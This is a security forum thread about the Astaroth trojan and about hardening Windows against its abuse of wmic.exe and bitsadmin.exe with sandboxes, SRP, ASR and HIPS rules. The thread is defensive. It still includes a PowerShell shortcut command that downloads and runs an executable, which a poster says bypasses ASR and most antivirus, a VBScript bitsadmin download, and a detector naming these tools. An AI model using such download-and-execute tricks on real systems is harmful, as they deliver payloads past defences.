This Trojan exploits antivirus software to steal your data

I think the most effective thing would be a sandbox..... Astaroth can't help it.
or if it can?:emoji_thinking:
Running the browser sandboxed is a good idea, but Sandboxie allows the user to recover any files downloaded. If the user is not tech savvy, the user will eventually end up executing the downloaded file.
 
Comodo or NVT OSA should block this but not sure about when with Comodo. Couple of questions:

-Anyone know what Comodo would see this action to be when the .lnk is run? I suppose the browser?
-How is the dropped file activated...is it via instructions in the .lnk file?

I guess I am never going to get away from Comodo, not that I'm really trying. Just wish Viruscope would identify more activities as potentially malicious...like a net-facing file (especially a downloaded one) that wants to download, etc. Someday...:emoji_pray:

I like the sandbox idea, but I haven't been using the Comodo sandbox for the browser so far. Seems to harm performance for me, but I don't like having to install Sandboxie. No experience with the setup, and I think I would get lost...
 
It is sufficient for this malware and some more. But WD ASR can possibly be bypassed on Windows Home and Pro by PowerShell, for example:
Code:
powershell Import-Module bitstransfer;Start-BitsTransfer 'https://kcsoftwares.com/files/sumo_lite.exe' $home\Downloads\sumo_lite.exe;$filepath = $HOME + '\Downloads\sumo_lite.exe'; Invoke-WmiMethod -class win32_Process -Name Create -ArgumentList $filepath
Create the shortcut with this command and click the shortcut. It should download and execute the known & legal & useful SUMo installer. This should also bypass most AVs (anti-script modules).
The SUMo webpage:

This will be blocked by SRP though. ASR on its own is not sufficient for sure but I wonder if blacklisting sponsors is really required or the native security mechanisms combined are sufficient.

Again, nothing wrong with blacklisting some sponsors whose behavior is clear and does not affect the system, but the task of compiling a policy for all sponsors is complex, and mistakes may break the system. If e.g. ASR+SRP (+others?) suffice, then it may make sense to stop there.
 
I think the most effective thing would be a sandbox..... Astaroth can't help it.
or if it can?:emoji_thinking:
It cannot infect the system when the user has run the shortcut in the sandbox. But it can gather and send information to the remote server (except in a sandbox with the Internet connection blocked). Furthermore, the malware works invisibly, so the user may think that it cannot run in the sandbox, and may be fooled into running it outside the sandbox.
I am not sure if the Comodo Firewall sandbox can stop the unsafe DLL from being injected by the legitimate Windows or Avast tools.
 
If wmic.exe and bitsadmin.exe are blocked from executing with a HIPS rule, will there be any problems with launching legitimate applications?
Those executables are hardly used by the user applications and Windows system. There should not be any problems with blocking them.
 
Sometimes bitsadmin is needed for Windows updates. It has a warning sign in SysHardener. I would not want to block it through the firewall; I prefer to block it through Hard_Configurator, so it will still be able to function when the system needs it.

But if you have a good default-deny that starts working quickly after reboot, then the payload will be blocked anyway. Even if bitsadmin downloaded it, it won't be able to run. Hard_Configurator is good for that, too.

Lockdown used to always say that blocking bitsadmin through firewall won't work, because at the firewall level, Windows sees it as SYSTEM, not as bitsadmin. So it will fly right by your firewall rule.
 
.. I wonder if blacklisting sponsors is really required or the native security mechanisms combined are sufficient.

Again, nothing wrong with blacklisting some sponsors whose behavior is clear and does not affect the system, but the task of compiling a policy for all sponsors is complex, and mistakes may break the system. If e.g. ASR+SRP (+others?) suffice, then it may make sense to stop there.
As I said, you can block shortcuts via SRP, but doing this in the proper way will require a good knowledge of SRP. Most people allow shortcuts in SRP.

Blocking many sponsors as administrator can be dangerous.
But, SRP can block them as standard user
 
But, SRP can block them as standard user
That's the safe way to do it. And use a Standard user account for daily computer use, to make it even harder for the bad guy to get elevated privileges.

ReHIPS blocks some sponsors even for admin, but allows them for SYSTEM.
 
I like the sandbox idea, but I haven't been using the Comodo sandbox for the browser so far. Seems to harm performance for me, but I don't like having to install Sandboxie. No experience with the setup, and I think I would get lost...
1: Comodo Sandbox: no need to use it for everything; it can be used selectively for mail and suspicious pages.
2: As for Sandboxie, the free version is very easy: just configure delete-on-exit and you are ready.:sneaky:
 
I am not sure if the Comodo Firewall sandbox can stop the unsafe DLL from being injected by the legitimate Windows or Avast tools.
I would take this opportunity to kindly request any of the testers to please test Comodo at cruelsister settings vs this malware and upload the video.:notworthy: Sorry I'm asking for too much. :emoji_cold_sweat:
 
Comodo or NVT OSA should block this but not sure about when with Comodo. Couple of questions:

-Anyone know what Comodo would see this action to be when the .lnk is run? I suppose the browser?
-How is the dropped file activated...is it via instructions in the .lnk file?

I guess I am never going to get away from Comodo, not that I'm really trying. Just wish Viruscope would identify more activities as potentially malicious...like a net-facing file (especially a downloaded one) that wants to download, etc. Someday...:emoji_pray:

I like the sandbox idea, but I haven't been using the Comodo sandbox for the browser so far. Seems to harm performance for me, but I don't like having to install Sandboxie. No experience with the setup, and I think I would get lost...
I never ran the Comodo sandbox with CS settings myself, since it runs the browser as rejected without an Internet connection lol

Sandboxie free is easy to use and doesn't slow anything down. I used it with the Basilisk browser and it was working pretty well. Have you completely gotten rid of Qihoo 360? I liked the Qihoo sandbox when I tried it.
 
As I said, you can block shortcuts via SRP, but doing this in the proper way will require a good knowledge of SRP. Most people allow shortcuts in SRP.

Blocking many sponsors as administrator can be dangerous.
But, SRP can block them as standard user

No need to block it for admin; a user should use SUA for day-to-day work. Shortcut SRP is probably needed (see below for a weaker alternative).

Assuming only administrative tasks happen as admin and there is no bypass for the native mechanisms, it becomes a question whether the below leaves anything open:

UAC+ASR+SRP(incl shortcuts)+Powershell constrained mode

I don't think it does, but ofc it needs a thorough analysis of the attack vectors to confirm or reject the statement.

A weakened version of this is:

UAC+ASR+SRP(without shortcuts)+Powershell constrained & only signed+block only Powershell in Windows Firewall

This does block one LOLBin, but just a single one, PowerShell; for everything else it relies on UAC+ASR+SRP.

Maybe the weaker version suffices as well

Edit: weaker version does not suffice as is but perhaps it’s worth checking what is missing (eg would adding DEP suffice?)
 
This malware does not run any installed application, but directly executes wmic.exe when the user clicks the shortcut.
This is how I cover wmic:
 
Sometimes bitsadmin is needed for Windows updates. It has a warning sign in SysHardener. I would not want to block it through the firewall; I prefer to block it through Hard_Configurator, so it will still be able to function when the system needs it.

But if you have a good default-deny that starts working quickly after reboot, then the payload will be blocked anyway. Even if bitsadmin downloaded it, it won't be able to run. Hard_Configurator is good for that, too.

Lockdown used to always say that blocking bitsadmin through firewall won't work, because at the firewall level, Windows sees it as SYSTEM, not as bitsadmin. So it will fly right by your firewall rule.
Windows Update can use the Background Intelligent Transfer Service (BITS) to download updates, but does not use bitsadmin.exe for that. BITS cannot be blocked by Windows Firewall or SRP, but bitsadmin.exe can be blocked by SRP, because the malware runs it with standard user rights. The download initiated by bitsadmin.exe cannot be blocked by Windows Firewall, because it is not bitsadmin.exe that downloads the file, but the Background Intelligent Transfer Service.
You can check it yourself by running the script below and looking in Process Explorer at the integrity level of bitsadmin.exe:
Code:
' Start bitsadmin.exe as the current (standard) user. The transfer itself is
' carried out by the BITS service (svchost.exe), not by bitsadmin.exe, which
' is why a per-executable firewall rule for bitsadmin.exe does not fire.
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "bitsadmin.exe /transfer 'JobName' https://kcsoftwares.com/files/sumo_lite.exe C:\Users\Admin\Downloads\sumo_lite.exe"
' Keep the script running for 10 s so the process tree stays visible in Process Explorer.
WScript.Sleep 10000

The script can be also used to confirm that the download initiated by bitsadmin.exe, cannot be blocked by the Windows Firewall rule, like @smu26 said.(y):giggle:


Post Edited.
I confirmed by myself that the download initiated by bitsadmin.exe cannot be stopped by the firewall rule for bitsadmin.exe. Before that, I wrongly thought that it could be stopped by the firewall, because it runs with standard user rights. But, in fact, the download is done by something else (the Background Intelligent Transfer Service).
 
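The two observations above (the shortcut directly executing wmic.exe, and bitsadmin.exe handing the actual download to the BITS service so that a per-executable firewall rule never sees it) can still be caught at the process-creation layer. The following is an added example and not code posted by anyone in this thread: a small Python detector run over constructed process-creation records in a key=value form. The hosts, the PC\alice and PC\bob accounts, the example.invalid URL, the placeholder wmic command line and the rule names are all made up for the demonstration, and treating "direct parent is explorer.exe" as the signature of a user-clicked .lnk is an assumption (a browser launching the download could be added to the same set).

```python
"""Added example: flag wmic.exe / bitsadmin.exe launched from a user-clicked
shortcut, using constructed process-creation records (not real telemetry)."""
import re
from dataclasses import dataclass
from typing import Dict, List

# The "sponsors" discussed in the thread. Hypothetical rule set for this demo.
LOLBINS = {"wmic.exe", "bitsadmin.exe"}
# Assumption: a shortcut the user double-clicks is spawned by the shell, so a
# LOLBin whose direct parent is explorer.exe is suspicious on its own.
USER_SHELLS = {"explorer.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# key=value pairs; values containing spaces are double-quoted in this format.
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Constructed sample log (Sysmon-like fields; users, PIDs and URL are invented).
# Line 2 is the wmic.exe the shortcut runs (its real arguments are unknown here,
# so a placeholder query is used); line 3 is the bitsadmin download; line 4 is
# the BITS service host that performs the transfer as SYSTEM; line 5 is an
# administrator running wmic interactively, which must not be flagged.
SAMPLE_LOG = r"""
pid=1180 ppid=900 image=C:\Windows\explorer.exe cmdline="C:\Windows\explorer.exe" user=PC\alice integrity=Medium
pid=5304 ppid=1180 image=C:\Windows\System32\wbem\WMIC.exe cmdline="wmic.exe os get caption" user=PC\alice integrity=Medium
pid=5310 ppid=1180 image=C:\Windows\System32\bitsadmin.exe cmdline="bitsadmin.exe /transfer job https://example.invalid/payload.exe C:\Users\alice\Downloads\payload.exe" user=PC\alice integrity=Medium
pid=1320 ppid=900 image=C:\Windows\System32\svchost.exe cmdline="svchost.exe -k netsvcs -p -s BITS" user="NT AUTHORITY\SYSTEM" integrity=System
pid=6100 ppid=5800 image=C:\Windows\System32\wbem\WMIC.exe cmdline="wmic.exe os get caption" user=PC\bob integrity=High
"""


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str
    user: str
    integrity: str

    @property
    def name(self) -> str:
        """Base name of the image, lower-cased (WMIC.exe -> wmic.exe)."""
        return self.image.rsplit("\\", 1)[-1].lower()


def parse_event(line: str) -> ProcEvent:
    """Parse one key=value record into a ProcEvent."""
    f = {k: (q or u) for k, q, u in KV_RE.findall(line)}
    return ProcEvent(int(f["pid"]), int(f["ppid"]), f["image"],
                     f["cmdline"], f["user"], f["integrity"])


def parse_log(text: str) -> List[ProcEvent]:
    return [parse_event(l) for l in text.splitlines() if l.strip()]


def detect(events: List[ProcEvent]) -> List[dict]:
    """Return one finding per LOLBin launch that looks like the shortcut chain."""
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    findings = []
    for e in events:
        if e.name not in LOLBINS:
            continue
        reasons = []
        parent = by_pid.get(e.ppid)
        if parent is not None and parent.name in USER_SHELLS:
            reasons.append(f"spawned directly by {parent.name} (shortcut click)")
        m = URL_RE.search(e.cmdline)
        if m:
            reasons.append(f"URL on the command line: {m.group(0)}")
        if reasons:
            findings.append({"pid": e.pid, "image": e.name, "user": e.user,
                             "integrity": e.integrity, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in detect(parse_log(SAMPLE_LOG)):
        print(f"[!] pid {f['pid']} {f['image']} as {f['user']} ({f['integrity']}): "
              + "; ".join(f["reasons"]))
```

Run against the constructed log it reports two findings: wmic.exe, because its parent is explorer.exe, and bitsadmin.exe for the same reason plus the URL on its command line. Both run at Medium integrity as the standard user, which is exactly why SRP can stop them; the svchost.exe BITS host that actually moves the bytes runs as SYSTEM and is the only thing a firewall rule would see, and the administrator's interactive wmic query does not fire.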
NVT SysHardener, NVT OSA, and H_C will block this malware.
Sorry for the dumb question. But can you please explain to me how they will stop the malware? Does SysHardener disable wmic/bitsadmin? And does OSA monitor wmic and bitsadmin? H_C at default-deny should stop the execution of the malicious .lnk shortcut file, right?